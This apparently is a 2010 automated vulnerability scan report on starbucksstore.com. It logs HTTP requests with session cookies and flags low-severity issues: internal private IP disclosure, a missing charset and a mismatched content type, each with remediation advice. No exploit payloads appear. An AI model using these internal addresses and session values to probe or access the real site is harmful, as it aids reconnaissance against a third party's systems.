GET /extras/newsletters.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16315 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:12 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/extras/newsletters.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/extras/newsletters.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/extras/newsletters.asp" ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /guestassist/ga_faq_shipop.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42716 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:01 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/ga_faq_shipop.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/ga_faq_shipop.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/ga_f ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /guestassist/gareturns.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15036 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:11 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/gareturns.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/gareturns.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/gareturn ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /guestassist/shcontus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20601 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:57 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus. ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20601 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=IMPPDLCBFMIGCMOPJPJFLFOO; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:21:14 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus. ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20694 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:12:46 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.108" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus. ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 12588 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=HCCBELCBGFGJAEFDAFOHNILL; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:39:41 GMT
<!--S1--><!--S0-->
<!-- Common Function include file -->
<!-- EMail include file -->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HT ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shgaemailconfirm.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shgaemailconfirm.asp" var s_prop3="SBDIRECT" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shgaem ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16848 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSCDCCADA=JDPAELCBMFLNOOGBJGPPEOAB; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:36:18 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shgaform.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shgaform.asp" var s_prop3="SBDIRECT" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shgaform.asp" ...[SNIP]...
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/mya/links.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/links.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/mya/links.asp" var s_prop7="" ...[SNIP]...
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/mya/track.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/track.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/mya/track.asp" var s_prop7="" ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shabotus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14434 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:33 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/shabotus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shabotus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/shabotu ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shourplg.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25328 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:40:37 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/shourplg.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shourplg.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/shourpl ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shprodde.asp?SKU=317917 HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35039 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:53 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Detail Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Detail Page : 317917 : Starbucks Starbucks VIA® Ready Brew Christmas Blend at StarbucksStore.com" var s_prop3="SBP ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shprodli.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14377 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:26 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodl ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/sitemap.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21107 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:41:26 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/sitemap.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/sitemap.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/sitemap. ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/terms.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15912 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:44 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/terms.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/terms.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/terms.asp" ...[SNIP]...
<meta HTTP-EQUIV="Conten ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-co ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /starbucks-coffee-tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16772 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:05 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-t ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /starbucks-gifts/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 17195 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:19 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/def ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79402 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:24 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/s ...[SNIP]...
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /aff/adredir.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:48 GMT Connection: close Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /aff/adredir.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:48 GMT Connection: close Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
Report generated by XSS.CX at Wed Nov 17 06:58:46 CST 2010.